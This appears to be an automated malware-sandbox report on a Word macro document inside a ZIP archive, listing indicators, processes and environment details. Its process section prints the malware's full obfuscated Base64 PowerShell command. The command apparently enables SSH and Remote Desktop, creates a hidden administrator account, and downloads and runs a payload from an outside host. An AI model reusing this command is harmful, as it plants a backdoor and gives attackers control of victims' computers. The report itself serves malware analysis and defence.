Malware analysis SCP-001_Proposal.zip Malicious activity

Add for printing

File name:	SCP-001_Proposal.zip
Full analysis:	https://app.any.run/tasks/dd56b507-00a8-488f-bcc1-fc3fe0edb0ab
Verdict:	Malicious activity
Analysis date:	September 28, 2024, 05:26:21
OS:	Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME:	application/zip
File info:	Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
MD5:	0D8F182CD7FE53E4AADE3F300A93A930
SHA1:	4B5B0BD6FD98CBC4A77C56426E5CA46CACF3A456
SHA256:	D7C85EC49D12420BEBDAD1544AC45210AED070FCF4F2A6FE0BDE327E505FE1E7
SSDEEP:	3072:KivLxGKFBiiFXzLUH3zB3AStEPn28ZUpF:KijUKFBdXzIH3zBVtE2OUpF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: on
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Changes powershell execution policy (Bypass)
  - OUTLOOK.EXE (PID: 4560)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 1132)
SUSPICIOUS
- Executable content was dropped or overwritten
  - powershell.exe (PID: 1132)
- Starts a Microsoft application from unusual location
  - DismHost.exe (PID: 3184)
- Base64-obfuscated command line is found
  - OUTLOOK.EXE (PID: 4560)
- BASE64 encoded PowerShell command has been detected
  - OUTLOOK.EXE (PID: 4560)
- Starts POWERSHELL.EXE for commands execution
  - OUTLOOK.EXE (PID: 4560)
- Reads security settings of Internet Explorer
  - WinRAR.exe (PID: 4528)
- Process drops legitimate windows executable
  - powershell.exe (PID: 1132)
INFO
- The process uses the downloaded file
  - WinRAR.exe (PID: 4528)
  - WINWORD.EXE (PID: 4652)
- The executable file from the user directory is run by the Powershell process
  - DismHost.exe (PID: 3184)
- Reads Microsoft Office registry keys
  - WinRAR.exe (PID: 4528)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.zip	\|	ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion:	20
ZipBitFlag:	0x0009
ZipCompression:	Unknown (99)
ZipModifyDate:	2024:08:23 21:33:14
ZipCRC:	0xc07f7beb
ZipCompressedSize:	112322
ZipUncompressedSize:	116383
ZipFileName:	SCP-001_Proposal.docm

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

151

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

1132

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -enc cwBFAFQALQBpAFQARQBtACAAIAB2AEEAcgBJAGEAQgBMAEUAOgBVAEQANAA1ACAAKABbAHQAWQBQAEUAXQAoACIAewA0AH0AewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAtAEYAIAAnAGUAUgAnACwAJwBuAFYAJwAsACcAdABFAE0ALgBDAG8AJwAsACcAdAAnACwAJwBTAHkAUwAnACkAKQA7ACAAIAAkADUAeABiADIANwBzACAAIAA9ACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsANAB9AHsAMgB9ACIAIAAtAGYAJwBTAFkAJwAsACcATQAuACcALAAnAC4ARgBJAEwAZQAnACwAJwBzAHQAZQAnACwAJwBpAG8AJwApACAAIAA7ACAAIAAuACgAIgB7ADEAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADMAfQB7ADIAfQAiAC0AZgAnAFcAJwAsACcAQQBkAGQAJwAsACcAdAB5ACcALAAnAGEAcABhAGIAaQBsAGkAJwAsACcAaQBuAGQAbwB3AHMAQwAnACwAJwAtACcAKQAgAC0ATwBuAGwAaQBuAGUAIAAtAE4AYQBtAGUAIAAoACIAewAwAH0AewAyAH0AewAzAH0AewA0AH0AewAxAH0AIgAtAGYAIAAnAE8AcAAnACwAJwBlAHIAdgBlAHIAJwAsACcAZQBuAFMAUwAnACwAJwBIACcALAAnAC4AUwAnACkACgAmACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAgACcAaQBjAGUAJwAsACcAUwB0AGEAcgB0AC0AUwBlACcALAAnAHIAdgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAcwBzAGgAJwAsACcAZAAnACkACgAmACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAZQAnACwAJwAtAFMAZQByAHYAaQBjACcALAAnAFMAZQAnACwAJwB0ACcAKQAgAC0ATgBhAG0AZQAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHMAcwBoACcALAAnAGQAJwApACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHUAdABvACcALAAnAEEAJwApACwAJwBtACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGEAdAAnACwAJwBpAGMAJwApACkACgAmACgAIgB7ADMAfQB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQAiAC0AZgAnAC0ATgAnACwAJwBlAHQARgBpAHIAZQB3AGEAJwAsACcAbABsACcALAAnAE4AZQB3ACcALAAnAFIAdQBsAGUAJwApACAALQBOAGEAbQBlACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHMAJwAsACcAcwBoAGQAJwApACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAoACgAIgB7ADMAfQB7ADQAfQB7ADEAfQB7ADIAfQB7ADUAfQB7ADAAfQAiACAALQBmACAAJwBkACkAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGUAcgAnACwAJwBIACAAUwAnACkALAAnAHYAZQByACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAE8AcAAnACwAJwBlAG4AUwAnACkALAAnAFMAJwAsACgAKAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHMAaAAnACwAJwAgACgAcwAnACkAKQApACkAKQAgAC0ARQBuAGEAYgBsAGUAZAAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAZQAnACwAJwBUAHIAdQAnACkAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHUAbgBkACcALAAnAEkAbgBiAG8AJwApACAALQBQAHIAbwB0AG8AYwBvAGwAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAFAAJwAsACcAVABDACcAKQAgAC0AQQBjAHQAaQBvAG4AIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAEEAbABsAG8AJwAsACcAdwAnACkAIAAtAEwAbwBjAGEAbABQAG8AcgB0ACAAMgAyAAoALgAoACIAewAxAH0AewAwAH0AewAyAH0AewAzAH0AIgAtAGYAJwB0AGUAbQBQAHIAJwAsACcAUwBlAHQALQBJACcALAAnAG8AJwAsACcAcABlAHIAdAB5ACcAKQAgAC0AUABhAHQAaAAgACgAKAAoACIAewA0AH0AewA5AH0AewA1AH0AewAzAH0AewAwAH0AewAxAH0AewAxADAAfQB7ADgAfQB7ADEAMQB9AHsAMgB9AHsANwB9AHsANgB9ACIAIAAtAGYAIAAnAGUAdAB7ADAAfQBDACcALAAnAG8AbgB0AHIAbwBsAHsAMAB9AFQAZQByAG0AaQBuACcALAAnAHsAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAG4AJwAsACcAbwBuAHQAcgBvAGwAUwAnACwAJwB0AEMAJwApACwAJwBIAEsATAAnACwAJwBlACcALAAnAH0AJwAsACcAMAAnACwAJwBTAGUAcgAnACwAJwBNADoAewAwAH0AUwB5AHMAdABlAG0AewAwAH0AQwB1AHIAcgAnACwAJwBhAGwAIAAnACwAJwB2AGUAcgAnACkAKQAgAC0ARgBbAEMAaABhAHIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgACgAIgB7ADMAfQB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQAiACAALQBmACcAbwBuAHMAJwAsACcAZQAnACwAJwB0AGkAJwAsACcAZgBEACcALAAoACIAewAzAH0AewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAGMAJwAsACcAeQBUACcALAAnAFMAQwBvAG4AbgBlACcALAAnAG4AJwApACkAIAAtAFYAYQBsAHUAZQAgADAACgAuACgAIgB7ADMAfQB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAGwAbAAnACwAJwBlAHcAYQAnACwAJwBSAHUAbABlACcALAAnAEUAbgBhAGIAbABlAC0ATgAnACwAJwBlAHQARgBpAHIAJwApACAALQBEAGkAcwBwAGwAYQB5AEcAcgBvAHUAcAAgACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAawB0AG8AJwAsACcARABlAHMAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnACAAJwAsACcAbwB0AGUAJwAsACcAUgBlAG0AJwApACwAJwBwACcAKQAKACQAewBNAEEAQQBhAGAATgBBAGEAYABBAGAATwBhAEEAfQAgAD0AIAAoACIAewAyAH0AewAzAH0AewAwAH0AewAxAH0AIgAgAC0AZgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcAZABhAHQAaQAnACwAJwBiACcALAAnAG8AbgBfACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYwBrAHUAcAAnACwAJwBhACcAKQAsACcAZgAnACwAJwBvAHUAbgAnACkACgAkAHsAQgBBAEEAQQBDAGAAQQBBAGAAQQBEAH0AIAA9ACAAKAAiAHsANAB9AHsAMQB9AHsAMwB9AHsAMgB9AHsANgB9AHsAMAB9AHsANQB9AHsANwB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAYQAnACwAJwA1ADgARQAnACkALAAnADMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAVQBuAGQANAAnACwAJwBPACcAKQAsACcAZgAnACwAJwB0AEgAJwAsACcAZQBOACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAbwBuAGgAJwAsACcAVAAxACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAUAB3ACcALAAnAE4AZQBEACEAJwApACkACgAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcALQBMAG8AYwBhAGwAVQBzACcALAAnAGUAcgAnACwAJwBOAGUAdwAnACkAIAAtAE4AYQBtAGUAIAAkAHsATQBhAGEAYQBgAE4AYABBAGEAQQBPAGAAQQBhAH0AIAAtAFAAYQBzAHMAdwBvAHIAZAAgACgALgAoACIAewAyAH0AewAxAH0AewAzAH0AewA0AH0AewAwAH0AIgAtAGYAJwByAGkAbgBnACcALAAnAG8AbgB2ACcALAAnAEMAJwAsACcAZQByAHQAVABvAC0AUwBlAGMAdQAnACwAJwByAGUAUwB0ACcAKQAgACQAewBCAEEAYQBgAEEAYABDAGAAQQBBAEEAZAB9ACAALQBBAHMAUABsAGEAaQBuAFQAZQB4AHQAIAAtAEYAbwByAGMAZQApACAALQBGAHUAbABsAE4AYQBtAGUAIAAoACIAewAxAH0AewA3AH0AewA1AH0AewA0AH0AewAwAH0AewAzAH0AewA2AH0AewAyAH0AIgAtAGYAIAAnACAAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbwB1AG4AJwAsACcARgAnACkALAAnAHUAbgB0ACcALAAnAEEAYwBjACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAgAEIAYQBjAGsAJwAsACcAdQBwACcAKQAsACcAbwBuACcALAAnAG8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAaQAnACwAJwBkAGEAdAAnACkAKQAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAKAAiAHsANAB9AHsAMgB9AHsANQB9AHsAMQB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAIAAnAG8AdQBuACcALAAnAEEAYwBjACcALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAdABpAG8AJwAsACcAbgAnACwAJwAgAEIAJwApACwAJwB0ACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG8AdQBuAGQAYQAnACwAJwBGACcAKQAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACcAcAAnACwAJwAgACcALAAnAGEAYwBrAHUAJwApACkACgAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADUAfQB7ADAAfQB7ADQAfQAiAC0AZgAgACcAdQAnACwAJwBjAGEAbABHAHIAJwAsACcATABvACcALAAnAEEAZABkAC0AJwAsACcAcABNAGUAbQBiAGUAcgAnACwAJwBvACcAKQAgAC0ARwByAG8AdQBwACAAKAAiAHsAMQB9AHsAMgB9AHsAMwB9AHsAMAB9ACIALQBmACAAJwBvAHIAcwAnACwAJwBBAGQAbQAnACwAJwBpACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAcgBhACcALAAnAG4AaQBzAHQAJwApACkAIAAtAE0AZQBtAGIAZQByACAAJAB7AG0AYQBhAGAAQQBuAGAAQQBBAGEAYABPAEEAQQB9AAoAJAB7AGIAYABBAGEAZgBDAEEAYQBmAH0AIAA9ACAAKAAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAtAE8AYgAnACwAJwBqAGUAYwB0ACcALAAnAE4AZQB3ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiAC0AZgAgACcAbgB0ACcALAAnAGUAJwAsACcAdAAuAFcAZQBiAEMAbABpACcALAAnAGUAJwAsACcATgAnACkAKQAuACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdAByAGkAbgBnACcALAAnAGwAbwBhAGQAUwAnACwAJwB3AG4AJwAsACcARABvACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAMQAzAH0AewA4AH0AewAxADgAfQB7ADcAfQB7ADEANgB9AHsANAB9AHsAMgB9AHsANQB9AHsAMQA1AH0AewAxADAAfQB7ADEAMgB9AHsAMQB9AHsAMQA5AH0AewAxADcAfQB7ADMAfQB7ADAAfQB7ADEANAB9AHsAOQB9AHsAMgAwAH0AewAxADEAfQB7ADYAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAMwBiACcALAAnADYANQAnACkALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAMABhACcALAAnAGMAZgA2AGIAOQAxADYAJwAsACcAYwBjAGEAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAC4AYwBvACcALAAnAHQAJwApACwAKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBiACcALAAnADcAJwAsACcAOQAwACcALAAnADQAMgAxADYAJwAsACcAZABiADEAMABhADUAJwAsACcAZgAyADAANAA3ADgAZgAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG8AJwAsACcAbgB0AGUAbgAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBtAC8AJwAsACcAegBhACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGQALgB0AHgAJwAsACcAdAAnACkALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAHQAaAAnACwAJwBpACcALAAnAHUAYgB1AHMAZQAnACkALAAnAHQAdAAnACwAJwA2ADcAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAGUAYQA4ACcALAAnADMAJwAsACcANgAxADUANAAnACkALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAHAAYQB5AGwAJwAsACcAbwBhACcALAAnADMAOABiAGUANgAvACcAKQAsACcAMABmACcALAAnAGgAJwAsACcANgBkACcALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAnAGMAaAB3ACcALAAnADcAMABjADYAMAAnACwAJwBvAG4AZwAwADIALwBjACcAKQAsACcAcgBjACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAHcALwA5AGYAZgAyACcALAAnAGEAJwAsACcANAAvAHIAJwApACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAGYAIAAnAC8AZwAnACwAJwBpAHMAdAAnACwAJwBwAHMAOgAvACcALAAnAC4AZwAnACkALAAnADIAYQBmACcALAAnADUANQAnACkAKQAKACQAewBEAGAARQBBAGAAQQBkAGYAYABBAGEAZAB9ACAAPQAgACAAIAAkAFUAZAA0ADUAOgA6ACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwA0AFMAJwAsACcAYQBzAGUANgAnACwAJwBpAG4AZwAnACwAJwB0AHIAJwAsACcARgByAG8AbQBCACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AEIAYABBAEEARgBjAGAAQQBgAEEAZgB9ACkACgAkAHsAVwBhAGEARABgAHgAQQBhAGAARABgAFkAQQBBAH0AIAA9ACAAKAAoACgAIgB7ADQAfQB7ADcAfQB7ADgAfQB7ADMAfQB7ADUAfQB7ADIAfQB7ADEAfQB7ADAAfQB7ADYAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAcwAnACwAJwBlAEoAVAAnACkALAAnAGsAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAYQBzACcALAAnAFQAVAAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAG4AZABvAHcAcwAnACwAJwBlACcAKQAsACcAQwA6AGUAJwAsACcASgAnACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwBoADAAcwB0AC4AJwAsACcAcwB2AGMAJwAsACcAZQB4AGUAJwApACwAJwBKAFQAVwAnACwAJwBpACcAKQApACAALQByAEUAUABMAGEAYwBFACgAWwBjAGgAQQByAF0AMQAwADEAKwBbAGMAaABBAHIAXQA3ADQAKwBbAGMAaABBAHIAXQA4ADQAKQAsAFsAYwBoAEEAcgBdADkAMgApAAoAIAAgACgAIAAgAEQAaQBSACAAIAB2AGEAUgBJAEEAYgBsAGUAOgA1AHgAQgAyADcAUwAgACkALgAiAHYAYABBAGwAVQBFACIAOgA6ACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBXAHIAaQB0ACcALAAnAGUAQQBsAGwAJwAsACcAQgAnACwAJwB5AHQAZQBzACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHcAQQBBAGQAWABBAGEAYABEAGAAWQBgAEEAQQB9ACwAIAAkAHsARABFAEEAQQBgAGQARgBhAGAAQQBEAH0AKQAKACYAIAAkAHsAVwBhAEEAZAB4AGAAQQBgAEEARABgAHkAQQBhAH0ACgA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

OUTLOOK.EXE

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3184

C:\Users\admin\AppData\Local\Temp\72AC800B-E058-4688-BD9D-F521AF8CFCA0\dismhost.exe {37076897-52BE-477F-9523-875ADD2B8028}

C:\Users\admin\AppData\Local\Temp\72AC800B-E058-4688-BD9D-F521AF8CFCA0\DismHost.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Dism Host Servicing Process

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\users\admin\appdata\local\temp\72ac800b-e058-4688-bd9d-f521af8cfca0\dismhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll

4528

"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\SCP-001_Proposal.zip

C:\Program Files\WinRAR\WinRAR.exe

—

explorer.exe

User:

admin

Company:

Alexander Roshal

Integrity Level:

MEDIUM

Description:

WinRAR archiver

Version:

5.91.0

Modules

Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

4560

"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding

C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft Outlook

Exit code:

Version:

16.0.16026.20146

Modules

Images
c:\program files\microsoft office\root\office16\outlook.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

4652

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb4528.179\SCP-001_Proposal.docm" /o ""

C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

WinRAR.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft Word

Version:

16.0.16026.20146

Modules

Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll

4780

"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "3348C58F-E0F8-4EF0-A3E7-598C602677C2" "62E8D84D-33FC-4E6E-ACC0-670831D11999" "4652"

C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe

—

WINWORD.EXE

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.

Version:

0.12.2.0

Modules

Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll

5068

C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -Embedding

C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe

—

svchost.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows Modules Installer Worker

Exit code:

Version:

10.0.19041.3989 (WinBuild.160101.0800)

Modules

Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll

5084

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

Add for printing

Total events

27 895

Read events

27 603

Write events

236

Delete events

Modification events


(PID) Process:	(4528) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	1
Value: C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
